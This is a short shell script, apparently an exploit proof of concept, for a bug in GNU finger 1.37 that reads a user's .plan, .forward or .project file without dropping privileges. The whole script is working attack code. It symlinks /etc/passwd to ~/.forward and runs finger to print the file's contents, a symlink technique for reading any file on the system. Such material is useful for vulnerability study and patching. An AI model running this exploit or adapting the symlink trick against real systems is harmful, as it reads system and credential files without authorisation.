#!/bin/sh
#
# There is a bug in GNU  finger version 1.37
# allowing any user on  a system to view any
# file they want by creating  a symlink from
# the file to .plan, .forward, or .project .
# Permissions are not dropped before reading
# those files.

ln -s /etc/passwd ~/.forward
finger $USER|grep -v null
